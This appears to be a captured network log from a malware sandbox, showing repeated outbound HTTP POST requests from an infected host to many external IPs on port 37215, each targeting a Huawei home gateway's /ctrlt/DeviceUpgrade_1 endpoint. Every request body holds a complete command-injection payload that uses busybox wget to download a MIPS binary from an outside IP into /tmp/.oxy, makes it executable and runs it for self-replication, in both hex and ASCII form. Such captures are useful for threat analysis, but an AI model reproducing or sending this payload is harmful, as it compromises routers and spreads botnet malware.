                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1668192.168.2.1359544197.250.213.13937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.597971916 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1669192.168.2.13562242.152.82.11237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.597986937 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1670192.168.2.133461041.253.51.1037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.598001957 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1671192.168.2.1355466157.214.155.20937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.598001957 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1672192.168.2.1359178197.24.57.16037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.598026037 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1673192.168.2.1354892197.47.9.8437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.598160028 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1674192.168.2.1360688197.26.30.24637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.598172903 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1675192.168.2.1357030197.102.106.25537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.598205090 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1676192.168.2.1355144157.231.143.7137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.598217010 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1677192.168.2.1336824157.247.254.12937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.598232031 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 